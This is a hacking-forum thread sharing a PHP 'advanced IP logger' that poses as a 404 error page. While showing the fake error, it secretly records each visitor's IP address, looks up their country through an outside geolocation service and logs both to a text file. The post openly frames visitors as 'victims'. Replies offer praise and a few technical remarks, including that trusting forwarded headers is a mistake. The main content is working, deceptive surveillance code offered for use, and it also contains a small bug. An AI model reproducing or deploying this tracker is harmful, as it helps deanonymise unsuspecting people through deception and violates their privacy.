Advanced IP Logger [PHP]

[blackhunt]

Here is an advanced IP logger in PHP that ensures the ip address is valid by going through several checks.

How it works

The process is really simple. When the victim enters the site, they will receive a 404 error message (which makes it look even more realistic). Then it gets the IP address of the victim, validates it and logs it in a txt file which contains the IP address, country and the current date.

The Code

<?php
function get_ip_address()
{
    if (!empty($_SERVER['HTTP_CLIENT_IP']) && validate_ip($_SERVER['HTTP_CLIENT_IP'])) {
        return $_SERVER['HTTP_CLIENT_IP'];
    }
    if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        if (strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',') !== false) {
            $iplist = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
            foreach ($iplist as $ip) {
                if (validate_ip($ip))
                    return $ip;
            }
        } else {
            if (validate_ip($_SERVER['HTTP_X_FORWARDED_FOR']))
                return $_SERVER['HTTP_X_FORWARDED_FOR'];
        }
    }
    if (!empty($_SERVER['HTTP_X_FORWARDED']) && validate_ip($_SERVER['HTTP_X_FORWARDED']))
        return $_SERVER['HTTP_X_FORWARDED'];
    if (!empty($_SERVER['HTTP_X_CLUSTER_CLIENT_IP']) && validate_ip($_SERVER['HTTP_X_CLUSTER_CLIENT_IP']))
        return $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];
    if (!empty($_SERVER['HTTP_FORWARDED_FOR']) && validate_ip($_SERVER['HTTP_FORWARDED_FOR']))
        return $_SERVER['HTTP_FORWARDED_FOR'];
    if (!empty($_SERVER['HTTP_FORWARDED']) && validate_ip($_SERVER['HTTP_FORWARDED']))
        return $_SERVER['HTTP_FORWARDED'];
    return $_SERVER['REMOTE_ADDR'];
}
function validate_ip($ip)
{
    if (strtolower($ip) === 'unknown')
        return false;
    $ip = ip2long($ip);
    if ($ip !== false && $ip !== -1) {
        $ip = sprintf('%u', $ip);
        if ($ip >= 0 && $ip <= 50331647)
            return false;
        if ($ip >= 167772160 && $ip <= 184549375)
            return false;
        if ($ip >= 2130706432 && $ip <= 2147483647)
            return false;
        if ($ip >= 2851995648 && $ip <= 2852061183)
            return false;
        if ($ip >= 2886729728 && $ip <= 2887778303)
            return false;
        if ($ip >= 3221225984 && $ip <= 3221226239)
            return false;
        if ($ip >= 3232235520 && $ip <= 3232301055)
            return false;
        if ($ip >= 4294967040)
            return false;
    }
    return true;
}
$ip      = get_ip_address();
$json    = file_get_contents("http://extreme-ip-lookup.com/json/" . $ip);
$data    = json_decode($json, true);
$country = $data['country'];
$date    = date('d/m/Y');
$myfile  = fopen("ips.txt", "a+");
fwrite($myfile, "Logged IP: ");
fwrite($myfile, get_ip_address());
fwrite($myfile, " ($country), at ");
fwrite($myfile, $date);
fwrite($myfile, "\n");
fclose();
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /login.php was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Remember to make a .txt file called "ips" in the same directory as the .php file.

source : #Blackfourms

 

[0xzPhatLosser_]

Looks very awesome mate.

 

[Dread Pirate Roberts]

это довольно распространённая ошибка веб-разработчиков - считать IP адрес посетителя чем угодно, кроме

$_SERVER['REMOTE_ADDR']

 

[ssx]

Thanks Buddy!

 

[oopsgeneration88]

This is a fairly common mistake of web developers - to consider the visitor’s IP address to be anything other than

$_SERVER['REMOTE_ADDR']

Well i definitely agree with you for this

 

[blackhunt]

Looks very awesome mate.

Enjoy !

 

[HostBost]

advanced IP logger

why advanced?

 

[Guron_18]

Первых 56 строк сможно заменить этим.

foreach($_SERVER as $key=>$value)
    echo sprintf("%s : %s", $key, $value);